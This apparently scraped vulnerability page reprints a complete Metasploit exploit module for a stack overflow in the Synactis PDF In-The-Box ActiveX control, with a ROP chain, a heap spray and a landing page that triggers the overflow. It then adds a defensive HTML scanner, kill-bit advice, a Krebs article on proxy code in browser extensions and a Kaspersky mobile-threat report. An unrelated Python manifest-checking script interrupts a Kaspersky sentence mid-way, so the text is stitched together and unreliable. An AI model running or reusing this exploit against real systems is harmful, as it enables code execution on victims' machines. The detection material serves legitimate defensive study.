Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow
2013-06-07T01:05:08
ID: MSF:EXPLOIT/WINDOWS/BROWSER/SYNACTIS_CONNECTTOSYNACTIS_BOF | Type: metasploit | Reporter: Rapid7 | Modified: 2020-10-02T20:00:37
Description
This module exploits a vulnerability found in Synactis' PDF In-The-Box ActiveX component, specifically PDF_IN_1.ocx. When a long string of data is given to the ConnectToSynactis function, which is meant to be used for the ldCmdLine argument of a WinExec call, a strcpy routine can end up overwriting a TRegistry class pointer saved on the stack, resulting in arbitrary code execution under the context of the user. Also note that since the WinExec function is used to call the default browser, you must be aware that: 1) The default must be Internet Explorer, and 2) when the exploit runs, another browser will pop up. Synactis PDF In-The-Box is also used by other software such as Logic Print 2013, which is how the vulnerability was found and publicly disclosed.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb
  #include Msf::Exploit::Remote::BrowserAutopwn
  #
  #autopwn_info({
  #  :ua_name    => HttpClients::IE,
  #  :ua_minver  => "7.0",
  #  :ua_maxver  => "8.0",
  #  :javascript => true,
  #  :classid    => "{C80CAF1F-C58E-11D5-A093-006097ED77E6}",
  #  :method     => "ConnectToSynactis",
  #  :os_name    => OperatingSystems::Match::WINDOWS,
  #  :rank       => AverageRanking
  #})

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow",
      'Description'    => %q{
          This module exploits a vulnerability found in Synactis' PDF In-The-Box ActiveX
          component, specifically PDF_IN_1.ocx. When a long string of data is given
          to the ConnectToSynactis function, which is meant to be used for the ldCmdLine
          argument of a WinExec call, a strcpy routine can end up overwriting a TRegistry
          class pointer saved on the stack, resulting in arbitrary code execution under the
          context of the user.

          Also note that since the WinExec function is used to call the default browser,
          you must be aware that: 1) The default must be Internet Explorer, and 2) when the
          exploit runs, another browser will pop up.

          Synactis PDF In-The-Box is also used by other software such as Logic Print 2013,
          which is how the vulnerability was found and publicly disclosed.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'h1ch4m',
          'sinn3r' # Metasploit
        ],
      'References'     =>
        [
          [ 'OSVDB', '93754' ],
          [ 'EDB', '25835' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Newer setups like Win + IE8: "Object doesn't support this property or method"
          [ 'Automatic', {} ],
          [
            'IE 7 on Windows XP SP3', {'Eax' => 0x0c0c0c0c}
          ],
          [
            # 0x20302020 = Where the heap spray will land
            # 0x77c15ed5 = xchg eax,esp; rcr dword ptr [esi-75], 0c1h, pop ebp; ret 4
            'IE 8 on Windows XP SP3',
            { 'Rop' => :msvcrt, 'Pivot' => 0x77C218D3, 'Ecx' => 0x20302024, 'Eax' => 0x20302028 }
          ]
        ],
      'Payload'        =>
        {
          'BadChars'        => "\x00",
          'StackAdjustment' => -3500
        },
      'DefaultOptions' =>
        {
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
      'Privileged'     => false,
      'DisclosureDate' => '2013-05-30',
      'DefaultTarget'  => 0))
  end

  # Resolves the 'Automatic' target from the browser's User-Agent string;
  # an explicitly chosen target is returned as-is.
  def get_target(agent)
    return target if target.name != 'Automatic'

    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

    ie_name = "IE #{ie}"

    os_name = nil
    case nt
    when '5.1'
      os_name = 'Windows XP SP3'
    end

    targets.each do |t|
      # os_name stays nil for any OS other than XP, so guard the include? call
      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and os_name and t.name.include?(os_name))
        return t
      end
    end

    return nil
  end

  # Builds the payload for the selected target: a msvcrt ROP chain followed by
  # the stack adjustment and shellcode for IE 8, or a 0x0c sled plus shellcode
  # for IE 7.
  def get_payload(t, cli)
    code = payload.encoded

    case t['Rop']
    when :msvcrt
      print_status("Using msvcrt ROP")
      align = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
      # Must be null-byte-free for the spray
      chain =
        [
          t['Pivot'],
          0x41414141,
          t['Ecx'],   # To ECX
          0x77c1e844, # POP EBP # RETN [msvcrt.dll]
          0x41414141,
          0x77c1e844, # skip 4 bytes [msvcrt.dll]
          0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
          0xffffffff,
          0x77c127e5, # INC EBX # RETN [msvcrt.dll]
          0x77c127e5, # INC EBX # RETN [msvcrt.dll]
          0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
          0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
          0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
          0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
          0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
          0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
          0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
          0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
          0x77c3048a, # POP EDI # RETN [msvcrt.dll]
          0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
          0x77c46efb, # POP ESI # RETN [msvcrt.dll]
          0x77c2aacc, # JMP [EAX] [msvcrt.dll]
          0x77c3b860, # POP EAX # RETN [msvcrt.dll]
          0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
          0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
          0x77c35459  # ptr to 'push esp # ret ' [msvcrt.dll]
        ].pack("V*")

      p = chain + align + code

    else
      p = "\x0c" * 50 + code
    end

    p
  end

  # Renders the landing page: the heap-spray helper, the encoded payload, and
  # the oversized string handed to ConnectToSynactis.
  def get_html(cli, req, target)
    js_p = ::Rex::Text.to_unescape(get_payload(target, cli), ::Rex::Arch.endian(target.arch))
    # Little-endian bytes of the target's EAX value as a JS "\x.." escape string
    eax = "\\x" + [target['Eax']].pack("V*").unpack("H*")[0].scan(/../) * "\\x"

    html = %Q|
    <html>
    <head>
    <script>
    #{js_property_spray}

    function r()
    {
      var s = unescape("#{js_p}");
      sprayHeap({shellcode:s});

      var p1 = '';
      var p2 = '';
      eax = "#{eax}";

      while (p1.length < 189) p1 += "\\x0c";
      while (p2.length < 7000) p2 += "\\x0c";

      var obj = document.getElementById("obj");
      obj.ConnectToSynactis(p1+eax+p2);
    }
    </script>
    </head>
    <body OnLoad="r();">
    <OBJECT classid="clsid:C80CAF1F-C58E-11D5-A093-006097ED77E6" id="obj"></OBJECT>
    </body>
    </html>
    |

    html.gsub(/^ {4}/, '')
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    uri   = request.uri
    print_status("Requesting: #{uri}")

    target = get_target(agent)
    if target.nil?
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    print_status("Target selected as: #{target.name}")
    send_response(cli, get_html(cli, request, target), {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
  end
end
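The landing page above is easy to recognise from the defender's side: it embeds the control by its CLSID, calls ConnectToSynactis, and builds the argument by padding strings to thousands of bytes while a heap spray runs. The following scanner is an added example written for this page, not code from the Metasploit module or from Synactis. It inspects HTML captured from a proxy, mail gateway or sandbox and classifies a page as clean, as legitimately using the control, or as an overflow attempt against it. The sample pages, the indicator names and the 256-character length threshold are constructed assumptions for the example; the CLSID and method name are the ones the module uses.

```ruby
# Added example (not part of the Metasploit module): flag HTML that instantiates
# the Synactis PDF In-The-Box control and feeds ConnectToSynactis an oversized
# string. Sample pages below are constructed for this example.

SYNACTIS_CLSID = 'C80CAF1F-C58E-11D5-A093-006097ED77E6'.freeze

# ConnectToSynactis is meant to receive a short command line for WinExec, so an
# argument padded far beyond that is an overflow indicator. 256 is an assumed
# threshold for this example, not a value from the module or the vendor.
SUSPICIOUS_LENGTH = 256

OBJECT_RE  = /classid\s*=\s*["']?clsid:#{SYNACTIS_CLSID}/i
CALL_RE    = /\.ConnectToSynactis\s*\(/i
LITERAL_RE = /ConnectToSynactis\s*\(\s*["']([^"']*)["']\s*\)/i
PADLOOP_RE = /while\s*\(\s*\w+\.length\s*<\s*(\d+)\s*\)/i
SPRAY_RE   = /sprayHeap\s*\(|unescape\s*\(\s*["']%u/i

# Returns the list of indicators found in one page.
def scan_html(html)
  findings = []
  findings << :synactis_object        if html =~ OBJECT_RE
  findings << :connecttosynactis_call if html =~ CALL_RE
  # A quoted literal argument longer than any plausible command line
  if (m = html.match(LITERAL_RE)) && m[1].length > SUSPICIOUS_LENGTH
    findings << :oversized_literal
  end
  # Loops that pad a variable to a large length before the call
  html.scan(PADLOOP_RE).flatten.each do |len|
    findings << :oversized_padding if len.to_i > SUSPICIOUS_LENGTH
  end
  findings << :heap_spray if html =~ SPRAY_RE
  findings.uniq
end

# Collapses the indicators into a verdict a pipeline can act on.
def verdict(html)
  f = scan_html(html)
  return :clean unless f.include?(:synactis_object) || f.include?(:connecttosynactis_call)
  overflow = f.include?(:oversized_literal) || f.include?(:oversized_padding)
  return :exploit_attempt if f.include?(:connecttosynactis_call) && (overflow || f.include?(:heap_spray))
  :control_in_use
end

# Constructed page shaped like the module's landing page (dummy spray content,
# no addresses): OBJECT tag, spray helper, padded strings, oversized call.
EXPLOIT_PAGE = <<~'HTML'
  <html><head><script>
  function r() {
    var s = unescape("%u9090%u9090");
    sprayHeap({shellcode:s});
    var p1 = ''; var p2 = '';
    while (p1.length < 189) p1 += "\x0c";
    while (p2.length < 7000) p2 += "\x0c";
    var obj = document.getElementById("obj");
    obj.ConnectToSynactis(p1 + p2);
  }
  </script></head>
  <body OnLoad="r();">
  <OBJECT classid="clsid:C80CAF1F-C58E-11D5-A093-006097ED77E6" id="obj"></OBJECT>
  </body></html>
HTML

# Constructed page that uses the control as intended: a short command line.
LEGIT_PAGE = <<~'HTML'
  <html><body>
  <OBJECT classid="clsid:C80CAF1F-C58E-11D5-A093-006097ED77E6" id="pdf"></OBJECT>
  <script>document.getElementById("pdf").ConnectToSynactis("report.pdf");</script>
  </body></html>
HTML

PLAIN_PAGE = "<html><body><p>No ActiveX here.</p></body></html>"

if __FILE__ == $0
  { 'exploit-shaped' => EXPLOIT_PAGE, 'legitimate' => LEGIT_PAGE, 'plain' => PLAIN_PAGE }.each do |name, page|
    puts "#{name}: #{verdict(page)} #{scan_html(page).inspect}"
  end
end
```

The scanner complements, rather than replaces, the root mitigation: setting the ActiveX kill bit for this CLSID (a `Compatibility Flags` DWORD of 0x400 under `HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{C80CAF1F-C58E-11D5-A093-006097ED77E6}`) stops Internet Explorer from loading PDF_IN_1.ocx at all, so a page that reaches ConnectToSynactis never gets to the strcpy.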
Source: https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb
{"krebs": [{"lastseen": "2021-03-01T18:27:09", "bulletinFamily": "blog", "cvelist": [], "description": "A company that rents out access to more than 10 million Web browsers so that clients can hide their true Internet addresses has built its network by paying browser extension makers to quietly include its code in their creations. This story examines the lopsided economics of extension development, and why installing an extension can be such a risky proposition.\n\n\n\nSingapore-based **Infatica[.]io** is part of a growing industry of shadowy firms trying to woo developers who maintain popular browser extensions -- desktop and mobile device software add-ons available for download from **Apple**, **Google**, **Microsoft** and **Mozilla** designed to add functionality or customization to one's browsing experience.\n\nSome of these extensions have garnered hundreds of thousands or even millions of users. But here's the rub: As an extension's user base grows, maintaining them with software updates and responding to user support requests tends to take up an inordinate amount of the author's time. Yet extension authors have few options for earning financial compensation for their work.\n\nSo when a company comes along and offers to buy the extension -- or pay the author to silently include some extra code -- that proposal is frequently too good to pass up.\n\nFor its part, Infatica seeks out authors with extensions that have at least 50,000 users. 
An extension maker who agrees to incorporate Infatica's computer code can earn anywhere from $15 to $45 each month for every 1,000 active users.\n\n\n\nAn Infatica graphic explaining the potential benefits for extension owners.\n\nInfatica's code then uses the browser of anyone who has that extension installed to route Web traffic for the company's customers, including marketers or anyone able to afford its hefty monthly subscription charges.\n\nThe end result is when Infatica customers browse to a web site, that site thinks the traffic is coming from the Internet address tied to the extension user, not the customer's.\n\nInfatica prices its service based on the volume of web traffic a customer is seeking to anonymize, from $360 a month for 40 gigabytes all the way to $20,000 a month for 10,000 gigabytes of data traffic pushed through millions of residential computers.\n\n#### THE ECONOMICS OF EXTENSIONS\n\n**Hao Nguyen** is the developer behind [ModHeader](<https://chrome.google.com/webstore/detail/modheader/idgpnmonknjnojddfkpgkljpfnnfcklj?hl=en>), an extension used by more than 400,000 people to test the functionality of websites by making it easier for users to modify the data shared with those sites. When Nguyen found himself spending increasing amounts of his time and money supporting the extension, he tried including ads in the program to help offset costs.\n\nModHeader users protested loudly against the change, and Nguyen removed the ads -- which he said weren't making him much money anyway.\n\n"I had spent at least 10 years building this thing and had no luck monetizing it," he told KrebsOnSecurity.\n\nNguyen said he ignored multiple requests from different companies offering to pay him to insert their code, mainly because the code gave those firms the ability to inject whatever they wanted into his program (and onto his users' devices) at any time.\n\nThen came Infatica, whose code was fairly straightforward by comparison, he said. 
It restricted the company to routing web requests through his users' browsers, and did not try to access more sensitive components of the user's browser experience, such as stored passwords and cookies, or viewing the user's screen.\n\nMore importantly, the deal would net him at least $1,500 a month, and possibly quite a bit more.\n\n"I gave Infatica a try but within a few days I got [a lot of negative user reviews](<https://github.com/bewisse/modheader/issues/64>)," he said. "They didn't like that the extension might be using their browser as a proxy for going to not so good places like porn sites."\n\nAgain he relented, and removed the Infatica code.\n\n#### A TARGET-RICH ENVIRONMENT\n\nThese days, Nguyen is focusing more of his time on [chrome-stats.com](<https://www.chrome-stats.com>), which provides detailed information on more than 150,000 extensions. The service is free for limited use, but subscribers who pay a monthly fee can get access to more resources, such as older extension versions and details about their code components.\n\nAccording to chrome-stats.com, the majority of extensions -- more than 100,000 of them -- are effectively abandoned by their authors, or haven't been updated in more than two years. In other words, there a great many developers who are likely to be open to someone else buying up their creation and their user base.\n\n[](<https://krebsonsecurity.com/wp-content/uploads/2021/02/chromeext-updates.png>)\n\nImage: chrome-stats.com\n\nThe vast majority of extensions are free, although a handful that have attracted a large and loyal enough following have been able to charge for their creations or for subscription services tied to the extension. 
But last year, Google announced it was [shutting down paid Chrome extensions offered on its Chrome Web Store](<https://www.theverge.com/2020/9/22/21451111/google-paid-chrome-extension-monetize-shut-down-end>).\n\nNguyen said this will only exacerbate the problem of frustrated developers turning to offers from dodgy marketing firms.\n\n"It's a really tough marketplace for extension developers to be able to monetize and get reward for maintaining their extensions," he said. "There are tons of small developers who haven't been able to do anything with their extensions. That's why some of them will go into shady integration or sell the extension for some money and just be done with it."\n\n[](<https://krebsonsecurity.com/wp-content/uploads/2021/02/hola-luminati.png>)\n\nA solicitation sent by Infatica to the developer of the SponsorBlock extension. Image: sponsor.ajay.app\n\n#### WHO IS INFATICA?\n\nIt is unclear how many extensions currently incorporate Infatica's code. KrebsOnSecurity searched for extensions that invoke several domains tied to Infatica's Web proxy service (e.g., **extendbalanc[.]org**, **ipv4v6[.]info**). This research was conducted using Nguyen's site and [crxcavator.io](<https://crxcavator.io>), a similar extension research site owned by networking giant **Cisco Systems**.\n\nThose searches revealed that Infatica's code has been associated with at least three dozen extensions over the past few years, including several that had more than 100,000 users. One of those is Video Downloader Plus, which at one point claimed nearly 1.4 million active users.\n\nThe founder and director of Infatica -- a resident of Biysk, Russia named **Vladimir Fomenko** -- did not respond to multiple requests for comment.\n\n\n\nInfatica founder Vladimir M. 
Fomenko.\n\nFomenko is the sole director of the [iNinja VPN](<https://www.thetimes.co.uk/article/kompromat-fears-over-vladimir-fomenkos-web-service-t7tqdrvcb>), another service that obfuscates the true Internet address of its more than 400,000 users. It stands to reason that iNinja VPN also is not only offering its customers a way to obfuscate their Internet address, but is actively using those same systems to route traffic for other customers: A Chrome browser plugin and ad blocker by the same name whose code includes Infatica's "extenbalanc" domain has 400,000 users.\n\nThat would put Infatica in line with the activities of another major controversial VPN/proxy provider: **Illuminati**, a.k.a. "**HolaVPN**." In 2015, security researchers [discovered](<http://adios-hola.org/>) that users of the HolaVPN browser extension were being used to funnel Web traffic for other people. Indeed, in the screenshot above, Infatica's marketing team can be seen comparing its business model to that of HolaVPN.\n\nFomenko has appeared in [two previous KrebsOnSecurity stories](<https://krebsonsecurity.com/?s=vladimir+fomenko&x=0&y=0>); both concerned **King Servers** (a.k.a. "**Hosting Solution Ltd.**"), a hosting company he has operated for years which caters mostly to adult websites.\n\nIn 2016, hackers suspected of working for Russian state security services [compromised databases for election systems in Arizona and Illinois](<https://edition.cnn.com/2016/08/29/politics/hackers-breach-illinois-arizona-election-systems/>). Six of the eight Internet addresses [identified by the FBI](<https://s.yimg.com/dh/ap/politics/images/boe_flash_aug_2016_final.pdf>) as sources of the attack traced back to King Servers. 
In [an interview](<https://www.nytimes.com/2016/09/28/world/europe/russia-hacker-vladimir-fomenko-king-servers.html>) with _The New York Times_ several months later, Fomenko flatly denied having any ties to the hacking.\n\nAccording to the Russian daily [_Novaya Gazeta_](<https://translate.google.com/translate?sl=ru&tl=en&u=https://novayagazeta.ru/articles/2017/01/26/71296-troyanskiy-kod>), revelations about the 2016 hacking incident's ties to King Servers [led to treason charges](<https://krebsonsecurity.com/2017/01/a-shakeup-in-russias-top-cybercrime-unit/>) against **Sergey Mikhaylov**, the former deputy chief of Russia's top anti-cybercrime unit.\n\nRussian authorities charged that Mikhaylov had tipped off the FBI to information about Fomenko and King Servers. In 2019, Mikhaylov was convicted and [sentenced to 22 years in a penal colony](<https://krebsonsecurity.com/2019/02/former-russian-cybersecurity-chief-sentenced-to-22-years-in-prison/>).\n\n#### BE SPARING IN TRUSTING EXTENSIONS\n\nBrowser extensions \u2014 however useful or fun they may seem when you install them \u2014 typically have a great deal of power and can effectively read and/or write all data in your browsing sessions. The powers granted to each extension are roughly spelled out in its "manifest," basically a description of what it will be able to access once you incorporate it into your browser.\n\nAccording to Nguyen's chrome-stats.com, about a third of all extensions for Chrome -- by far the most widely-used Web browser -- require no special permissions. But the remainder require the user to place a good deal of trust in the extension's author. 
For example, approximately 30 percent can view all of your data on all or specific websites, or index your open tabs and browsing activity.\n\n[](<https://krebsonsecurity.com/wp-content/uploads/2021/02/chromext-permissions.png>)\n\nImage: chrome-stats.com\n\nMore than 68,000 Chrome extensions allow the execution of arbitrary code in the context of webpages, effectively allowing the extension to alter the appearance and functionality of specific sites.\n\nI hope it\u2019s obvious by this point, but readers should be extremely cautious about installing extensions \u2014 sticking mainly to those that are actively supported and respond to user concerns.\n\nPersonally, I do not make much use of browser extensions. In almost every case I\u2019ve considered installing one I\u2019ve been sufficiently spooked by the permissions requested that I ultimately decided it wasn\u2019t worth the risk, given that any extension can go rogue at the whims of its author.\n\nIf you\u2019re the type of person who uses multiple extensions, it may be wise to adopt a risk-based approach going forward. Given the high stakes that typically come with installing an extension, consider carefully whether having the extension is truly worth it. This applies equally to plug-ins designed for Web site content management systems like **WordPress** and** Joomla**.\n\nDo not agree to update an extension if it suddenly requests more permissions than a previous version. This should be a giant red flag that something is not right. If this happens with an extension you trust, you\u2019d be well advised to remove it entirely.\n\nAlso, never download and install an extension just because some Web site says you need it to view some type of content. Doing so is almost always a high-risk proposition. 
Here, Rule #1 from [KrebsOnSecurity\u2019s Three Rules of Online Safety](<https://krebsonsecurity.com/2011/05/krebss-3-basic-rules-for-online-safety/>) comes into play: \u201cIf you didn\u2019t go looking for it, don\u2019t install it.\u201d Finally, in the event you do wish to install something, make sure you\u2019re getting it directly from the entity that produced the software.\n\nGoogle Chrome users can see any extensions they have installed by clicking the three dots to the right of the address bar, selecting \u201cMore tools\u201d in the resulting drop-down menu, then \u201cExtensions.\u201d In Firefox, click the three horizontal bars next to the address bar and select \u201cAdd-ons,\u201d then click the \u201cExtensions\u201d link on the resulting page to view any installed extensions.", "modified": "2021-03-01T17:22:35", "published": "2021-03-01T17:22:35", "id": "KREBS:FC02DE3210F644EBBE06FE9EBFD81A45", "href": "https://krebsonsecurity.com/2021/03/is-your-browser-extension-a-botnet-backdoor/", "type": "krebs", "title": "Is Your Browser Extension a Botnet Backdoor?", "cvss": {"score": 0.0, "vector": "NONE"}}], "securelist": [{"lastseen": "2021-03-01T14:31:28", "bulletinFamily": "blog", "cvelist": [], "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data._\n\n## The year in figures\n\nIn 2020, Kaspersky mobile products and technologies detected:\n\n * 5,683,694 malicious installation packages,\n * 156,710 new mobile banking Trojans,\n * 20,708 new mobile ransomware Trojans.\n\n## Trends of the year\n\nIn their campaigns to infect mobile devices, cybercriminals always resort to social engineering tools, the most common of these passing a malicious application off as another, popular and desirable one. All they need to do is correctly identify the application, or at least, the type of applications, that are currently in demand. 
Therefore, attackers constantly monitor the situation in the world, collecting the most interesting topics for potential victims, and then use these for infection or cheating users out of their money. It just so happened that the year 2020 gave hackers a large number of powerful news topics, with the COVID-19 pandemic as the biggest of these.

### Pandemic theme in mobile threats

The word "covid" in various combinations was typically used in the names of packages hiding spyware and banking Trojans, adware or Trojan droppers. Names we encountered included _covid.apk_, _covidMapv8.1.7.apk_, _tousanticovid.apk_, _covidMappia_v1.0.3.apk_ and _coviddetect.apk_. These apps were placed on malicious websites, hyperlinks were distributed through spam, etc.

The mobile malware Trojan-Ransom.AndroidOS.Agent.aq often hid behind another popular term, "corona". Here are a few names of malicious files: ir.corona.viruss.apk, coronalocker.zip, com.coronavirus.inf.apk, coronaalert.apk, corona.apk, corona-virusapps.com.zip, com.coronavirus.map.1.1.apk, coronavirus.china.

Of course, this was not limited to naming: the pandemic theme was also used in application user interfaces. For example, the GINP banking Trojan pretended to be an app that searched for COVID-19-infected individuals: the victim was coaxed into providing their bank card details under the pretext of a €0.75 fee.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01125546/mobile_report_2020_01.png>)

The creators of another banking Trojan, Cebruser, simply named it "Coronavirus", probably to echo the disturbing news coming from all over the world and to make some money along the way. As in the previous case, the attackers were after the bank card details and the owner's personal information.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01125607/mobile_report_2020_02.png>)

They came up with nothing new in terms of technique. So-called "web injectors", which had been perfected over years, were used in both cases. When certain events are detected, the banking Trojan opens a window that displays a web page requesting bank card details. The page can have any design: we have seen a request from a large bank in one case and a message about a search for COVID-19-infected individuals in another. This flexibility allows attackers to efficiently manipulate potential victims, adapting attacks to the situation both on a particular device and in the world at large.

We could conclude that the pandemic as a global phenomenon had a major effect on the mobile threat landscape, but to be true to the facts, this is not entirely the case. If you look at the dynamics of attacks on mobile users in 2020, you will see that the average monthly number of attacks decreased by 865,000 compared to 2019. That number seems large, but it is only about 1.07% of total attacks, so we cannot call it a significant decrease.

_Number of attacks on mobile users in 2019 and 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01124715/01-en-mobile-report-2020.png>))_

Besides, we saw a decrease in attacks in the first half of 2020, which can be attributed to the confusion of the first months of the pandemic: hackers had other things to worry about. However, in the second half of the year, when the situation became calmer and more predictable despite lockdowns in a number of countries, we saw a clear increase in attacks.

In addition, our telemetry has shown significant growth in mobile financial threats in 2020. More on that later.

### Adware

Last year was notable for both malware and adware, the two being very close in terms of capabilities. Typically, code that runs ads was embedded in a carrier application, e.g. a mobile game or torch, as long as it was popular enough. After the application ran, it could follow one of several scenarios, depending on its creator's greed and the advertising module's capabilities. If the user was lucky, they saw an advertising banner at the bottom of the carrier application window; if not, the advertising module subscribed to USER_PRESENT (device unlock) events and used a SYSTEM_ALERT_WINDOW window to display full-screen banners at random intervals.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01125652/mobile_report_2020_03.png>) 
**_Ad window (left) and carrier app definition (right)_**

In the latter case, the problem was not just the size of the banner, but also the difficulty of identifying the application it was coming from. There were usually no technical obstacles to removing this application, and with it, the ads. We had recorded apps featuring aggressive advertising appearing in Google Play before, but 2020 proved rich in [cases](<https://securelist.com/in-app-advertising-in-android/97065/>) of this kind.

In terms of the number of attacks on mobile users, the situation around various advertising modules and applications looked more or less stable. This is probably one of the few classes of threats where the number of attacks hardly changed in 2020 as compared to the previous year.

_Number of adware attacks on mobile users in 2019 and 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01124742/02-en-mobile-report-2020.png>))_

The number of unique users attacked by adware decreased slightly compared to 2019.

_Users attacked by adware in 2018 through 2020 ([download](<https://khub-media.s3.eu-west-1.amazonaws.com/wp-content/uploads/sites/58/2021/02/26182406/03-en-ru-es-mobile-report-2020.png>))_

Interestingly enough, the share of adware attacks increased in relation to mobile malware in general.
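The overlay behaviour described in the Adware section above (an ad module that wakes on the USER_PRESENT unlock broadcast and draws full-screen banners through a SYSTEM_ALERT_WINDOW window) leaves a footprint in the app's manifest that an analyst can check before running anything. The following is an added example, not code from the Kaspersky report or from any product: it parses a decoded AndroidManifest.xml and flags the combination of an unlock receiver and the overlay permission. The two manifests are constructed for the example; the package names, the receiver class name and the `triage_manifest` function are assumptions of the example.

```python
"""Manifest-level triage for the overlay-on-unlock adware pattern.

Added example, not Kaspersky's or any vendor's code. It looks for the
combination of (1) a broadcast receiver registered for USER_PRESENT, the
device-unlock event, and (2) the SYSTEM_ALERT_WINDOW permission, which lets
an app draw over other apps. Either alone is common in legitimate apps;
together they match the full-screen-banner-on-unlock behaviour described in
the text. The manifests below are constructed; the package names are not
real apps.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME = f"{{{ANDROID_NS}}}name"  # ElementTree spelling of android:name

OVERLAY_PERMISSION = "android.permission.SYSTEM_ALERT_WINDOW"
UNLOCK_ACTION = "android.intent.action.USER_PRESENT"


def triage_manifest(manifest_xml: str) -> dict:
    """Return the package name, human-readable findings and a triage flag.

    The flag is a hint for an analyst, not a detection on its own: overlay
    permission plus an unlock receiver can be legitimate (e.g. a lock-screen
    replacement), so the findings list is returned for manual review.
    """
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "<unknown>")

    permissions = {el.get(NAME) for el in root.iter("uses-permission")}

    # Map each receiver to the broadcast actions it registers for. Actions sit
    # inside <intent-filter>; iter() walks all descendants, so they are found.
    receiver_actions = {
        r.get(NAME): {a.get(NAME) for a in r.iter("action")}
        for r in root.iter("receiver")
    }
    unlock_receivers = sorted(
        name for name, actions in receiver_actions.items()
        if UNLOCK_ACTION in actions
    )

    findings = []
    if OVERLAY_PERMISSION in permissions:
        findings.append("requests SYSTEM_ALERT_WINDOW (can draw over other apps)")
    for name in unlock_receivers:
        findings.append(f"receiver {name} listens for USER_PRESENT (device unlock)")

    return {
        "package": package,
        "findings": findings,
        "overlay_on_unlock": OVERLAY_PERMISSION in permissions and bool(unlock_receivers),
    }


# Constructed manifest modelled on the carrier-app pattern from the text: a
# torch app whose bundled ad module wakes on unlock and draws over the screen.
SUSPICIOUS_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.freetorch">
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <application android:label="Free Torch">
        <activity android:name=".MainActivity"/>
        <receiver android:name="com.adsdk.UnlockReceiver" android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.USER_PRESENT"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>
"""

# Constructed benign manifest: the same torch app without an ad module.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.plaintorch">
    <uses-permission android:name="android.permission.CAMERA"/>
    <application android:label="Plain Torch">
        <activity android:name=".MainActivity"/>
    </application>
</manifest>
"""


if __name__ == "__main__":
    for xml in (SUSPICIOUS_MANIFEST, BENIGN_MANIFEST):
        result = triage_manifest(xml)
        verdict = "REVIEW" if result["overlay_on_unlock"] else "ok"
        print(f"{result['package']} -> {verdict}")
        for line in result["findings"]:
            print("   ", line)
```

The check reads a decoded manifest, such as the one apktool writes when unpacking an APK; it does not parse the binary manifest inside the APK directly. Because the ad SDK is usually a separate package namespace inside the same APK, the receiver name is included in the finding so an analyst can see which component, not just which app, registers for the unlock event.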
Whereas it was 12.85% in 2019, it reached 14.62% in 2020.

_Distribution of attacks by type of software used in 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01124850/04-en-mobile-report-2020.png>))_

Adware creators are interested in obstructing the removal of their products from a mobile device. They typically work with malware developers to achieve this. An example of such a partnership is the use of various Trojan botnets: we saw a number of [these cases](<https://securelist.com/pig-in-a-poke-smartphone-adware/97607/>) in 2020.

The pattern is quite simple. The bot infects a mobile device and waits for a command, usually trying to avoid the victim's attention. As soon as the owners of the botnet and their customers come to an agreement, the bot receives a command to download, install and run a payload, in this case adware. If the victim is annoyed by the unsolicited advertising and removes the source, the bot simply repeats the steps. In addition, Trojans have been known to elevate access privileges on the device, placing adware in the system area so that the user is unable to remove it without outside help.

